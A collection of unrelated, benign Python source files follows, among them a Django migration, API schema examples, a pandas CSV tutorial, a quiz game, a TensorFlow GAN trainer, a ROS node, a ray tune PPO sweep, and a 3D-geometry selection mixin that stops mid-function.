from __future__ import unicode_literals
import django.core.files.storage
from django.db import migrations, models
import djangoplicity.contacts.models
class Migration(migrations.Migration):
dependencies = [
('contacts', '0008_auto_20190926_1400'),
]
operations = [
migrations.AlterField(
model_name='import',
name='data_file',
field=models.FileField(storage=django.core.files.storage.FileSystemStorage(base_url=None, location=b'/home/noirlabadmin/shared/contacts_import'), upload_to=djangoplicity.contacts.models.handle_uploaded_file),
),
]
|
StarcoderdataPython
|
1854797
|
<reponame>ThePokerFaCcCe/myblog
from drf_spectacular.utils import OpenApiExample, OpenApiParameter
from rest_framework import serializers
from core.schema_helper import (schema_generator,
RESPONSE_DEFAULT_RETRIEVE,
PAGINATION_DEFAULT, RESPONSE_DEFAULT_PAGINATED)
from social.schemas import TAG_RESPONSE_RETRIEVE
from picturic.schemas import PICTURE_DEFAULT
USER_EDIT_REQUEST = OpenApiExample(
name='User',
request_only=True,
value=schema_generator({
"first_name": str,
"last_name": str,
"birth_date": "date",
})
)
USER_STAFF_EDIT_REQUEST = OpenApiExample(
name='Staff User',
request_only=True,
value={
**USER_EDIT_REQUEST.value,
**schema_generator({
'email': 'email',
'is_active': bool,
'is_vip': bool,
'is_author': bool,
'rank_expire_date': "datetime",
})
}
)
USER_SUPER_EDIT_REQUEST = OpenApiExample(
name='Super User',
request_only=True,
value={
**USER_EDIT_REQUEST.value,
**USER_STAFF_EDIT_REQUEST.value,
**schema_generator({
'is_staff': bool,
'is_superuser': bool,
})
}
)
class RUDParametersSerializer(serializers.Serializer):
id = serializers.IntegerField(min_value=0, required=False, allow_null=True)
slug = serializers.SlugField(allow_unicode=True, required=False, allow_null=True)
rud_parameters = OpenApiParameter('Get Item', description='Enter either `id` or `slug` for finding item', type=RUDParametersSerializer)
CATEGORY_INFO_DEFAULT = {
"id": int,
"title": str,
"slug": str,
"special_for": "V",
}
POST_RESPONSE_RETRIEVE = OpenApiExample(
**RESPONSE_DEFAULT_RETRIEVE,
value=schema_generator({
"id": int,
"title": str,
"slug": str,
"special_for": "V",
"category": CATEGORY_INFO_DEFAULT,
"picture": PICTURE_DEFAULT,
"content": str,
"author": int,
"tags": [TAG_RESPONSE_RETRIEVE.value],
"likes": int,
"dislikes": int,
"liked_by_user": bool,
"created_at": "datetime",
"updated_at": "datetime"
})
)
POST_RESPONSE_PAGINATED = OpenApiExample(
**RESPONSE_DEFAULT_PAGINATED,
value={
**PAGINATION_DEFAULT,
'results': [POST_RESPONSE_RETRIEVE.value]
}
)
|
StarcoderdataPython
|
3534509
|
#coding: utf-8
from pandas import Series, DataFrame
import pandas as pd
import numpy as np
import sys
df = pd.read_csv('ex1.csv')
print(df)
df_read_table = pd.read_table('ex1.csv', sep=',')
print(df_read_table)
nohead_csv = pd.read_csv('no_head_csv.csv', header=None)
print(nohead_csv)
nohead_csv = pd.read_csv(
'no_head_csv.csv', names=[
'a', 'b', 'c', 'd', 'message'])
print(nohead_csv)
names = ['a', 'b', 'c', 'd', 'message']
nohead_csv = pd.read_csv('no_head_csv.csv', names=names, index_col='message')
print(nohead_csv)
parsed = pd.read_csv('csv_mindex.csv', index_col=['key1', 'key2'])
print(parsed)
result = pd.read_csv('big_csv.csv', nrows=5)
print(result)
chunker = pd.read_csv('big_csv.csv', chunksize=500)
print(chunker)
tot = Series([])
for piece in chunker:
tot = tot.add(piece['key'].value_counts(), fill_value=0)
tot = tot.sort_values(ascending=True)
print(tot)
data = pd.read_csv('ex1.csv')
print(data)
data.to_csv('out.csv')
data.to_csv(sys.stdout, sep='|')
print(data.to_csv('out2.csv', index=False, header=False))
dates = pd.date_range('1/1/2017', periods=7)
ts = Series(np.arange(7), dates)
print(ts)
ts.to_csv('tseries.csv')
|
StarcoderdataPython
|
1698723
|
<filename>plato/processors/compress.py
"""
Implements a Processor for compressing a numpy array.
"""
from typing import Any
import zstd
from plato.processors import base
class Processor(base.Processor):
""" Implements a Processor for compressing numpy array. """
def __init__(self, cr=1, **kwargs) -> None:
super().__init__(**kwargs)
self.compression_ratio = cr
def process(self, data: Any) -> Any:
""" Implements a Processor for compressing numpy array. """
if isinstance(data, list):
ret = []
datashape_feature = data[0][0].shape
datatype_feature = data[0][0].dtype
ret.append((datashape_feature, datatype_feature))
for logits, targets in data:
datashape_target = targets.shape
datatype_target = targets.dtype
datacom_feature = zstd.compress(logits, self.compression_ratio)
datacom_target = zstd.compress(targets, self.compression_ratio)
ret.append((datacom_feature, datacom_target, datashape_target,
datatype_target))
else:
ret = (data.shape, data.dtype,
zstd.compress(data, self.compression_ratio))
return ret
|
StarcoderdataPython
|
4837174
|
<filename>simpleGame.py
# Simple game in python
import time
while True:#infinite loop
print('Hi, welcome to the Tim quiz!')
time.sleep(0.5)
print('Try to get as many questions correct as possible...')
time.sleep(0.5)
totalQuestions = 4
score = 0
ans = input('1. What is the name of my youtube channel? ')
if ans.lower() == 'tech with tim':
time.sleep(0.5)
print('Correct!')
score += 1
else:
time.sleep(0.5)
print('Incorrect')
time.sleep(0.5)
ans = input('2. What is my age? ')
if ans == "17":
time.sleep(0.5)
print('Correct!')
score += 1
elif ans == "seventeen":
time.sleep(0.5)
print('Correct!')
score += 1
elif ans.lower() == "seventeen":
time.sleep(0.5)
print('Correct!')
score += 1
else:
time.sleep(0.5)
print('Incorrect')
ans = input('3. What is my favourite sport? ')
if ans.lower() == "soccer":
time.sleep(0.5)
print('Correct!')
score += 1
elif ans.lower() == "football":
time.sleep(0.5)
print('Correct!')
score += 1
else:
time.sleep(0.5)
print('Incorrect')
ans = input('4. What is my favourite food? ')
if ans.lower() == "pizza":
time.sleep(0.5)
print('Correct!')
score += 1
else:
time.sleep(0.5)
print('Incorrect')
time.sleep(0.5)
print("Calculating score!")
time.sleep(0.5)
print("Thank you for playing!")
time.sleep(1)
countdown=5
for i in range(countdown):
print(countdown)
time.sleep(1)
countdown -= 1
percent = (score/totalQuestions) * 100
print("Mark: " + str(int(percent)) + '%')
if percent >= 50:
print('Nice! You passed!')
else:
print('Better luck next time')
print("If you want to quit, please press ctrl+c. If no, this game will run in an infinte loop")
time.sleep(3)
|
StarcoderdataPython
|
164441
|
<reponame>Rabbit1010/TensorFlow2.0-Tutorial-2019
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 23 17:11:08 2019
@author: Wei-Hsiang, Shen
"""
import matplotlib.pyplot as plt
import tensorflow as tf
import time
from GAN_model import Generator_Model, Discriminator_Model
from data_generator import Get_DS
EPOCHS = 1000
BATCH_SIZE = 128 # this should be much smaller in generative models
train_ds, val_ds = Get_DS(BATCH_SIZE)
generator = Generator_Model()
discriminator = Discriminator_Model()
noise_dim = 200 # input shape of the generator
cross_entropy = tf.keras.losses.BinaryCrossentropy(from_logits=True)
def discriminator_loss(judgment_real, judgment_fake):
# judgement from real images should be close to 1
real_loss = cross_entropy(tf.ones_like(judgment_real), judgment_real)
# judgement from fake images should be close to 0
fake_loss = cross_entropy(tf.zeros_like(judgment_fake), judgment_fake)
# Total loss
total_loss = real_loss + fake_loss
return total_loss
def generator_loss(judgment_fake):
# generator wants the judgment of fake images to be close to 1
return cross_entropy(tf.ones_like(judgment_fake), judgment_fake)
# We will reuse this seed overtime (so it's easier) to visualize progress
num_examples_to_generate = 25
seed = tf.random.normal([num_examples_to_generate, noise_dim])
def generate_and_save_images(model, epoch, test_input):
# Notice `training` is set to False, so all layers run in inference mode (batchnorm).
predictions = model(test_input, training=False)
predictions = predictions.numpy()
predictions[predictions<0] = 0
predictions[predictions>1] = 1
fig = plt.figure(dpi=100, figsize=(16, 16))
for i in range(predictions.shape[0]):
plt.subplot(5, 5, i+1)
plt.imshow(predictions[i], vmin=0, vmax=1)
plt.axis('off')
plt.savefig('./results/test_image_at_epoch_{:04d}.png'.format(epoch))
plt.close(fig)
generator_optimizer = tf.keras.optimizers.RMSprop(1e-4)
discriminator_optimizer = tf.keras.optimizers.RMSprop(1e-4)
@tf.function
def train_step(batch):
noise = tf.random.normal([BATCH_SIZE, noise_dim])
# we want to have two tapes so that we can get two different gradients
with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:
# Notice `training` is set to True, so all layers run in training mode (batchnorm).
# Generator generates a batch of images from noise
generated_images = generator(noise, training=True)
# Discriminator takes in fake images from generator and true images from dataset
judgment_real = discriminator(batch, training=True)
judgment_fake = discriminator(generated_images, training=True)
# calculate the loss of both models
gen_loss = generator_loss(judgment_fake)
disc_loss = discriminator_loss(judgment_real, judgment_fake)
# Get their graident from loss to all variables
gradients_of_generator = gen_tape.gradient(gen_loss, generator.trainable_variables)
gradients_of_discriminator = disc_tape.gradient(disc_loss, discriminator.trainable_variables)
# Apply gradient descent using optimizer
generator_optimizer.apply_gradients(zip(gradients_of_generator, generator.trainable_variables))
discriminator_optimizer.apply_gradients(zip(gradients_of_discriminator, discriminator.trainable_variables))
return gen_loss, disc_loss
# Main training loop
for epoch in range(EPOCHS):
start_time = time.time()
gen_loss_total = 0
disc_loss_total = 0
i_step = 1
print("Epoch {}/{}".format(epoch+1, EPOCHS))
for batch in train_ds: # for each batch, note that we do not code batch per epoch, the dataset would end if all data is used
gen_loss, disc_loss = train_step(batch)
gen_loss_total += gen_loss
disc_loss_total += disc_loss
print("\rStep {}".format(i_step), end='')
i_step += 1
end_time = time.time()
print(', gen_loss: {:.3f}, disc_loss: {:.3f}, time: {:.2f} sec'.format(gen_loss_total, disc_loss_total, end_time-start_time))
if epoch%50 == 0: # save weights every 50 epochs
generator.save_weights('./checkpoints/generator_weights_{}.h5'.format(epoch))
# Save generated image at the end of each epoch
generate_and_save_images(generator, epoch + 1, seed)
|
StarcoderdataPython
|
349436
|
#!/usr/bin/env python
import rospy
import sys
import os
import math
import csv
from nav_msgs.msg import Odometry
from std_msgs.msg import Int64
from geometry_msgs.msg import PoseStamped
car_name = str(sys.argv[1])
pkg_path = str(sys.argv[2])
trajectory_name = str(sys.argv[3])
plan = []
min_index_pub = rospy.Publisher('/{}/purepursuit_control/index_nearest_point'.format(car_name), Int64, queue_size = 1)
min_pose_pub = rospy.Publisher('/{}/purepursuit_control/visualize_nearest_point'.format(car_name), PoseStamped, queue_size = 1)
def construct_path():
file_path = os.path.expanduser('{}/path/{}.csv'.format(pkg_path, trajectory_name))
with open(file_path) as csv_file:
csv_reader = csv.reader(csv_file, delimiter = ',')
for waypoint in csv_reader:
plan.append(waypoint)
for index in range(0, len(plan)):
for point in range(0, len(plan[index])):
plan[index][point] = float(plan[index][point])
def odom_callback(data):
min_index = Int64()
curr_x = data.pose.pose.position.x
curr_y = data.pose.pose.position.y
min_index.data = find_nearest_point(curr_x, curr_y)
min_index_pub.publish(min_index)
pose = PoseStamped()
pose.pose.position.x = plan[min_index.data][0]
pose.pose.position.y = plan[min_index.data][1]
min_pose_pub.publish(pose)
def find_nearest_point(curr_x, curr_y):
ranges = []
for index in range(0, len(plan)):
eucl_x = math.pow(curr_x - plan[index][0], 2)
eucl_y = math.pow(curr_y - plan[index][1], 2)
eucl_d = math.sqrt(eucl_x + eucl_y)
ranges.append(eucl_d)
return(ranges.index(min(ranges)))
if __name__ == '__main__':
try:
rospy.init_node('nearest_pose_isolator', anonymous = True)
if not plan:
rospy.loginfo('obtaining trajectory')
construct_path()
rospy.Subscriber('/{}/base/odom'.format(car_name), Odometry, odom_callback)
rospy.spin()
except rospy.ROSInterruptException:
pass
|
StarcoderdataPython
|
6593553
|
cont = cont2 = cont4 = cont5 = 0
cont3 = 16
times = ['Atlético-MG', 'Flamengo', 'Palmeiras', 'Fortaleza', 'Corinthians', 'Bragrantino', 'Fluminense', 'América-MG', 'Atlético-GO', 'Santos', 'Ceará', 'Internacional', 'São Paulo', 'Athletico-PR', 'Cuiabá', 'Juventude', 'Grêmio', 'Bahia', 'Sport', 'Chapecoense']
print('Tabela Brasileirão 2021:', end = ' ')
while True:
print(times[cont], end=', ')
cont += 1
if cont > 19:
print('')
break
print('=-' * 30)
print('G4:', end = ' ')
while True:
print(times[cont2], end=', ')
cont2 += 1
if cont2 > 3:
print('')
break
print('=-' * 30)
print('Z4:', end = ' ')
while True:
print(times[cont3], end=', ')
cont3 += 1
if cont3 > 19:
print('')
break
print('=-' * 30)
print('Ordem álfabetica:', end = ' ')
while True:
if times[cont4] == 'Chapecoense':
chape_posicao = cont4 + 1
break
cont4 += 1
times.sort()
while True:
print(times[cont5], end=', ')
cont5 += 1
if cont5 == 19:
print('')
break
print('=-' * 30)
print(f'A Chapecoense ficou na posição {chape_posicao}')
|
StarcoderdataPython
|
6533181
|
import os
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.INFO)
def create_folder(location):
if not os.path.exists(location):
os.makedirs(location)
def get_session_config():
config = tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=False
)
config.gpu_options.allow_growth = True
config.gpu_options.per_process_gpu_memory_fraction = 1.0
return config
def get_checkpoint(checkpoint_dir, log=True):
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if log:
tf.logging.info("loading tensorflow checkpoints...")
tf.logging.info('[+] Get checkpoint {}'.format(ckpt))
if ckpt and ckpt.model_checkpoint_path:
last_step = int(ckpt.model_checkpoint_path.split("-")[-1])
ckpt_path = ckpt.model_checkpoint_path
if log:
tf.logging.info("[+] RESTORE SAVED VARIBALES : restored {}".format(ckpt_path))
tf.logging.info("[+] RESTORE SAVED VARIBALES : restart from step {}".format(last_step))
else:
raise RuntimeError('checkpoint file was not found')
return ckpt_path, last_step
def get_batch_nums(batch_size, gpus):
q, r = divmod(batch_size, gpus)
return [q + 1] * r + [q] * (gpus - r)
def get_init_pretrained():
saver_reader = tf.train.Saver(
tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
)
init_fn = lambda sess, ckpt_path: saver_reader.restore(sess, ckpt_path)
return init_fn
# borrowed from https://github.com/lengstrom/fast-style-transfer/blob/master/src/utils.py
def get_files(img_dir):
imgs, masks, xmls = list_files(img_dir)
return list(map(lambda x: os.path.join(img_dir,x), imgs)),\
list(map(lambda x: os.path.join(img_dir,x), masks)),\
list(map(lambda x: os.path.join(img_dir,x), xmls))
def list_files(in_path):
img_files = []
mask_files = []
gt_files = []
for (dirpath, dirnames, filenames) in os.walk(in_path):
for file in filenames:
filename, ext = os.path.splitext(file)
ext = str.lower(ext)
if ext == '.jpg' or ext == '.jpeg' or ext == '.gif' or ext == '.png' or ext == '.pgm':
img_files.append(os.path.join(dirpath, file))
elif ext == '.bmp':
mask_files.append(os.path.join(dirpath, file))
elif ext == '.xml' or ext == '.gt' or ext == '.txt':
gt_files.append(os.path.join(dirpath, file))
elif ext == '.zip':
continue
else:
print ('There is no file : %s'%(file))
# img_files.sort()
# mask_files.sort()
# gt_files.sort()
return img_files, mask_files, gt_files
|
StarcoderdataPython
|
6514314
|
"""
Example of how to use the ray tune library to perform hyperparameter sweeps on
the Proximal Policy Optimization (PPO) algorithm.
"""
import argparse
from functools import partial
import numpy as np
import pandas as pd
from ray import tune
from ray.tune import Analysis, CLIReporter
from ray.tune.schedulers import ASHAScheduler
from ilpyt.agents.ppo_agent import PPOAgent
from ilpyt.algos.rl import RL
from ilpyt.utils.env_utils import build_env
from ilpyt.utils.net_utils import choose_net
from ilpyt.utils.seed_utils import set_seed
pd.set_option(
"display.max_rows",
None,
"display.max_columns",
None,
"display.max_colwidth",
None,
)
def train(
config,
env_id,
num_episodes,
num_env: int = 16,
use_gpu: bool = True,
seed: int = 24,
):
# Set random seed
set_seed(seed)
# Build environment
env = build_env(env_id=env_id, num_env=num_env, seed=seed)
# Build agent
agent = PPOAgent(
actor=choose_net(env, activation='tanh'),
critic=choose_net(env, activation='tanh', output_shape=1),
lr=config['lr'],
gamma=config['gamma'],
clip_ratio=config['clip_ratio'],
entropy_coeff=config['entropy_coeff'],
)
algo = RL(
env=env, agent=agent, use_gpu=use_gpu, save_path='.', load_path=''
)
algo.train(
num_episodes=num_episodes, rollout_steps=config['rollout_steps']
)
tune.report(reward=np.mean(algo.reward_tracker))
def hyperparameter_search(env, num_samples=100, max_num_epochs=5000):
config = {
"clip_ratio": tune.choice([0.1, 0.2, 0.3]),
"gamma": tune.choice([0.9, 0.99, 0.999]),
"lr": tune.choice([1e-5, 5e-5, 1e-4, 5e-4, 1e-3, 5e-3, 1e-2]),
"rollout_steps": tune.choice([8, 16, 32, 64]),
"entropy_coeff": tune.choice([1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1]),
}
scheduler = ASHAScheduler(
metric="reward",
mode="max",
max_t=max_num_epochs,
grace_period=1,
reduction_factor=2,
)
reporter = CLIReporter(metric_columns=["reward", "training_iteration"])
result = tune.run(
partial(train, env_id=env, num_episodes=max_num_epochs),
name="PPO_%s" % env,
resources_per_trial={"cpu": 1, "gpu": 0.1},
config=config,
num_samples=num_samples,
scheduler=scheduler,
progress_reporter=reporter,
raise_on_failed_trial=False,
)
best_trial = result.get_best_trial("reward", "max", "last-5-avg")
print("Best trial config: {}".format(best_trial.config))
print("Best trial reward: {}".format(best_trial.last_result["reward"]))
def report_results(results_dir):
result = Analysis(results_dir)
trials = result.dataframe("reward", "max")
top_trials = trials.sort_values(by=['reward']).tail(5)
selected_columns = [col for col in top_trials.columns if 'config' in col]
selected_columns += ['reward', 'done', 'logdir']
print(top_trials[selected_columns])
top_trials[selected_columns].to_csv('results.csv')
if __name__ == "__main__":
# Command line arguments
parser = argparse.ArgumentParser()
parser.add_argument(
'--env',
type=str,
default='LunarLanderContinuous-v2',
help='name of registered gym environment',
)
args = parser.parse_args()
hyperparameter_search(args.env)
|
StarcoderdataPython
|
3289596
|
from distutils.core import setup
setup(
name='py-synology',
version='0.5.1',
packages=['synology'],
url='https://github.com/metronidazole/py-synology',
license='MIT',
author='snjoetw, metronidazole',
author_email='',
description='Python API for Synology Surveillance Station (DSM7)',
requires=['requests']
)
|
StarcoderdataPython
|
8110931
|
<gh_stars>1-10
##############################################################################
## Copyright (C) 1999-2006 Michigan State University ##
## Based on work Copyright (C) 1993-2003 California Institute of Technology ##
## ##
## Read the COPYING and README files, or contact '<EMAIL>', ##
## before continuing. SOME RESTRICTIONS MAY APPLY TO USE OF THIS FILE. ##
##############################################################################
import sys
import SCons
import CmdLineOpts, SConsOpts, StaticHelp, TestUtil
def Configure(args, env):
env.Replace(AvidaUtils_path = __path__)
# Load platform-specific configuration and default options.
env.Tool('PlatformTool', toolpath = __path__)
# Load custom options file: if user specified the customOptions
# option, figure out what custom options file they want to use,
# otherwise use the default one.
#
# This step uses platform-specific defaults defined in the
# 'PlatformTool', so must run after the 'PlatformTool' has been
# loaded.
#
env.Replace(default_custom_options_filename = 'my_avida_build_options.py')
custom_options = args.get('customOptions', env.subst('$default_custom_options_filename'))
if custom_options not in ['None', 'none']:
print "Reading custom options from file '%s' ..." % custom_options
# Load command-line arguments into Options parser.
opts = SCons.Options.Options([custom_options], args)
# Parses Avida-specific command-line arguments, loads default values
# for options not specified at the command line, and creates help text
# for available options.
#
CmdLineOpts.Update(opts, env)
SConsOpts.Update(env)
# Load various customized build tools.
#
# Some of these can be tweaked by our custom command-line options, so
# must be loaded after command-line arguments are parsed.
#
if env['enablePyPkg'] in ('True', '1', 1):
env.Tool('GCCXMLTool', toolpath = __path__)
env.Tool('PythonTool', toolpath = __path__)
env.Tool('BoostPythonTool', toolpath = __path__)
env.Tool('PysteTool', toolpath = __path__)
env.Tool('UnitTestTool', toolpath = __path__)
# Provide help text.
StaticHelp.GenerateStaticHelpText(env)
env.Help(opts.GenerateHelpText(env))
|
StarcoderdataPython
|
5128725
|
<reponame>benspaulding/django-shortwave
from django.conf.urls.defaults import *
urlpatterns = patterns('',
(r'^shortwave/', include('shortwave.urls')),
)
|
StarcoderdataPython
|
1680471
|
<gh_stars>10-100
from ...base import *
from .transform import TransformMixin
class SelectionMixin:
""" GeomDataObject class mix-in """
def __setstate__(self, state):
self._poly_selection_data = {"selected": [], "unselected": []}
self._selected_subobj_ids = {"vert": [], "edge": [], "poly": [], "normal": []}
def _edit_state(self, state):
del state["_poly_selection_data"]
del state["_selected_subobj_ids"]
def __init__(self):
self._poly_selection_data = {"selected": [], "unselected": []}
self._selected_subobj_ids = {"vert": [], "edge": [], "poly": [], "normal": []}
self._sel_subobj_ids_backup = {}
self._selection_backup = {}
def update_selection(self, subobj_type, subobjs_to_select, subobjs_to_deselect,
update_verts_to_transf=True, selection_colors=None, geom=None):
selected_subobj_ids = self._selected_subobj_ids[subobj_type]
geoms = self._geoms[subobj_type]
selected_subobjs = [subobj for subobj in subobjs_to_select
if subobj.id not in selected_subobj_ids]
deselected_subobjs = [subobj for subobj in subobjs_to_deselect
if subobj.id in selected_subobj_ids]
if not (selected_subobjs or deselected_subobjs):
return False
if subobj_type == "poly":
geom_selected = geoms["selected"]
geom_unselected = geoms["unselected"]
sel_data = self._poly_selection_data
data_selected = sel_data["selected"]
data_unselected = sel_data["unselected"]
prim = geom_selected.node().modify_geom(0).modify_primitive(0)
array_sel = prim.modify_vertices()
stride = array_sel.array_format.stride
size_sel = array_sel.get_num_rows()
row_count = sum([len(poly) for poly in selected_subobjs], size_sel)
array_sel.set_num_rows(row_count)
view_sel = memoryview(array_sel).cast("B")
prim = geom_unselected.node().modify_geom(0).modify_primitive(0)
array_unsel = prim.modify_vertices()
size_unsel = array_unsel.get_num_rows()
row_count = sum([len(poly) for poly in deselected_subobjs], size_unsel)
array_unsel.set_num_rows(row_count)
view_unsel = memoryview(array_unsel).cast("B")
polys_sel = []
polys_unsel = []
row_ranges_sel_to_keep = SparseArray()
row_ranges_sel_to_keep.set_range(0, array_sel.get_num_rows())
row_ranges_unsel_to_keep = SparseArray()
row_ranges_unsel_to_keep.set_range(0, size_unsel)
row_ranges_sel_to_move = SparseArray()
row_ranges_unsel_to_move = SparseArray()
for poly in selected_subobjs:
selected_subobj_ids.append(poly.id)
start = data_unselected.index(poly[0]) * 3
polys_sel.append((start, poly))
row_ranges_unsel_to_keep.clear_range(start, len(poly))
row_ranges_unsel_to_move.set_range(start, len(poly))
for poly in deselected_subobjs:
selected_subobj_ids.remove(poly.id)
start = data_selected.index(poly[0]) * 3
polys_unsel.append((start, poly))
row_ranges_sel_to_keep.clear_range(start, len(poly))
row_ranges_sel_to_move.set_range(start, len(poly))
polys_sel.sort()
polys_unsel.sort()
for _, poly in polys_sel:
data_selected.extend(poly)
for vert_ids in poly:
data_unselected.remove(vert_ids)
for _, poly in polys_unsel:
data_unselected.extend(poly)
for vert_ids in poly:
data_selected.remove(vert_ids)
f = lambda values, stride: (v * stride for v in values)
for i in range(row_ranges_unsel_to_move.get_num_subranges()):
start = row_ranges_unsel_to_move.get_subrange_begin(i)
size = row_ranges_unsel_to_move.get_subrange_end(i) - start
offset_, start_, size_ = f((size_sel, start, size), stride)
view_sel[offset_:offset_+size_] = view_unsel[start_:start_+size_]
size_sel += size
size_unsel -= size
offset = 0
for i in range(row_ranges_unsel_to_keep.get_num_subranges()):
start = row_ranges_unsel_to_keep.get_subrange_begin(i)
size = row_ranges_unsel_to_keep.get_subrange_end(i) - start
offset_, start_, size_ = f((offset, start, size), stride)
view_unsel[offset_:offset_+size_] = view_unsel[start_:start_+size_]
offset += size
for i in range(row_ranges_sel_to_move.get_num_subranges()):
start = row_ranges_sel_to_move.get_subrange_begin(i)
size = row_ranges_sel_to_move.get_subrange_end(i) - start
offset_, start_, size_ = f((size_unsel, start, size), stride)
view_unsel[offset_:offset_+size_] = view_sel[start_:start_+size_]
size_unsel += size
size_sel -= size
offset = 0
for i in range(row_ranges_sel_to_keep.get_num_subranges()):
start = row_ranges_sel_to_keep.get_subrange_begin(i)
size = row_ranges_sel_to_keep.get_subrange_end(i) - start
offset_, start_, size_ = f((offset, start, size), stride)
view_sel[offset_:offset_+size_] = view_sel[start_:start_+size_]
offset += size
array_sel.set_num_rows(size_sel)
array_unsel.set_num_rows(size_unsel)
else:
if subobj_type == "vert":
combined_subobjs = self.merged_verts
elif subobj_type == "edge":
combined_subobjs = self.merged_edges
elif subobj_type == "normal":
combined_subobjs = self.shared_normals
selected_subobjs = set(combined_subobjs[subobj.id] for subobj in selected_subobjs)
deselected_subobjs = set(combined_subobjs[subobj.id] for subobj in deselected_subobjs)
sel_state_geom = geom if geom else geoms["sel_state"]
vertex_data = sel_state_geom.node().modify_geom(0).modify_vertex_data()
col_writer = GeomVertexWriter(vertex_data, "color")
if selection_colors:
sel_colors = selection_colors
else:
sel_colors = Mgr.get("subobj_selection_colors")[subobj_type]
color_sel = sel_colors["selected"]
color_unsel = sel_colors["unselected"]
for combined_subobj in selected_subobjs:
selected_subobj_ids.extend(combined_subobj)
for row_index in combined_subobj.row_indices:
col_writer.set_row(row_index)
col_writer.set_data4(color_sel)
for combined_subobj in deselected_subobjs:
for subobj_id in combined_subobj:
selected_subobj_ids.remove(subobj_id)
for row_index in combined_subobj.row_indices:
col_writer.set_row(row_index)
col_writer.set_data4(color_unsel)
if subobj_type == "normal":
selected_normal_ids = []
deselected_normal_ids = []
for combined_subobj in selected_subobjs:
selected_normal_ids.extend(combined_subobj)
for combined_subobj in deselected_subobjs:
deselected_normal_ids.extend(combined_subobj)
self.update_locked_normal_selection(selected_normal_ids, deselected_normal_ids)
if update_verts_to_transf:
self._update_verts_to_transform(subobj_type)
return True
def is_selected(self, subobj):
return subobj.id in self._selected_subobj_ids[subobj.type]
def get_selection(self, subobj_lvl):
selected_subobj_ids = self._selected_subobj_ids[subobj_lvl]
if subobj_lvl == "poly":
polys = self._subobjs["poly"]
return [polys[poly_id] for poly_id in selected_subobj_ids]
if subobj_lvl == "vert":
combined_subobjs = self.merged_verts
elif subobj_lvl == "edge":
combined_subobjs = self.merged_edges
elif subobj_lvl == "normal":
combined_subobjs = self.shared_normals
return list(set(combined_subobjs[subobj_id] for subobj_id in selected_subobj_ids))
def create_selection_backup(self, subobj_lvl):
if subobj_lvl in self._selection_backup:
return
self._sel_subobj_ids_backup[subobj_lvl] = self._selected_subobj_ids[subobj_lvl][:]
self._selection_backup[subobj_lvl] = self.get_selection(subobj_lvl)
def restore_selection_backup(self, subobj_lvl):
sel_backup = self._selection_backup
if subobj_lvl not in sel_backup:
return
self.clear_selection(subobj_lvl, False)
self.update_selection(subobj_lvl, sel_backup[subobj_lvl], [], False)
del sel_backup[subobj_lvl]
del self._sel_subobj_ids_backup[subobj_lvl]
def remove_selection_backup(self, subobj_lvl):
sel_backup = self._selection_backup
if subobj_lvl in sel_backup:
del sel_backup[subobj_lvl]
del self._sel_subobj_ids_backup[subobj_lvl]
def clear_selection(self, subobj_lvl, update_verts_to_transf=True, force=False):
if not (force or self._selected_subobj_ids[subobj_lvl]):
return
geoms = self._geoms[subobj_lvl]
if subobj_lvl == "poly":
geom_selected = geoms["selected"]
geom_unselected = geoms["unselected"]
sel_data = self._poly_selection_data
sel_data["unselected"].extend(sel_data["selected"])
sel_data["selected"] = []
from_array = geom_selected.node().modify_geom(0).modify_primitive(0).modify_vertices()
from_size = from_array.data_size_bytes
from_view = memoryview(from_array).cast("B")
to_array = geom_unselected.node().modify_geom(0).modify_primitive(0).modify_vertices()
to_size = to_array.data_size_bytes
to_array.set_num_rows(to_array.get_num_rows() + from_array.get_num_rows())
to_view = memoryview(to_array).cast("B")
to_view[to_size:to_size+from_size] = from_view
from_array.clear_rows()
elif subobj_lvl == "normal":
color = Mgr.get("subobj_selection_colors")["normal"]["unselected"]
color_locked = Mgr.get("subobj_selection_colors")["normal"]["locked_unsel"]
vertex_data = geoms["sel_state"].node().modify_geom(0).modify_vertex_data()
col_writer = GeomVertexWriter(vertex_data, "color")
verts = self._subobjs["vert"]
for vert_id in self._selected_subobj_ids["normal"]:
vert = verts[vert_id]
row = vert.row_index
col = color_locked if vert.has_locked_normal() else color
col_writer.set_row(row)
col_writer.set_data4(col)
else:
vertex_data = geoms["sel_state"].node().modify_geom(0).modify_vertex_data()
color = Mgr.get("subobj_selection_colors")[subobj_lvl]["unselected"]
new_data = vertex_data.set_color(color)
vertex_data.set_array(1, new_data.arrays[1])
self._selected_subobj_ids[subobj_lvl] = []
if update_verts_to_transf:
self._verts_to_transf[subobj_lvl] = {}
def delete_selection(self, subobj_lvl, unregister_globally=True, unregister_locally=True):
subobjs = self._subobjs
verts = subobjs["vert"]
edges = subobjs["edge"]
polys = subobjs["poly"]
selected_subobj_ids = self._selected_subobj_ids
selected_vert_ids = selected_subobj_ids["vert"]
selected_edge_ids = selected_subobj_ids["edge"]
selected_poly_ids = selected_subobj_ids["poly"]
if subobj_lvl == "vert":
polys_to_delete = set()
for vert in (verts[v_id] for v_id in selected_vert_ids):
polys_to_delete.add(polys[vert.polygon_id])
elif subobj_lvl == "edge":
polys_to_delete = set()
for edge in (edges[e_id] for e_id in selected_edge_ids):
polys_to_delete.add(polys[edge.polygon_id])
elif subobj_lvl == "poly":
polys_to_delete = [polys[poly_id] for poly_id in selected_poly_ids]
self.delete_polygons(polys_to_delete, unregister_globally, unregister_locally)
def _restore_subobj_selection(self, time_id):
obj_id = self.toplevel_obj.id
prop_id = self._unique_prop_ids["subobj_selection"]
data = Mgr.do("load_last_from_history", obj_id, prop_id, time_id)
verts = self._subobjs["vert"]
normal_ids = data["normal"]
old_sel_normal_ids = set(self._selected_subobj_ids["normal"])
new_sel_normal_ids = set(normal_ids)
sel_normal_ids = new_sel_normal_ids - old_sel_normal_ids
unsel_normal_ids = old_sel_normal_ids - new_sel_normal_ids
unsel_normal_ids.intersection_update(verts)
shared_normals = self.shared_normals
original_shared_normals = {}
if unsel_normal_ids:
tmp_shared_normal = Mgr.do("create_shared_normal", self, unsel_normal_ids)
unsel_id = tmp_shared_normal.id
original_shared_normals[unsel_id] = shared_normals[unsel_id]
shared_normals[unsel_id] = tmp_shared_normal
unsel_normals = [tmp_shared_normal]
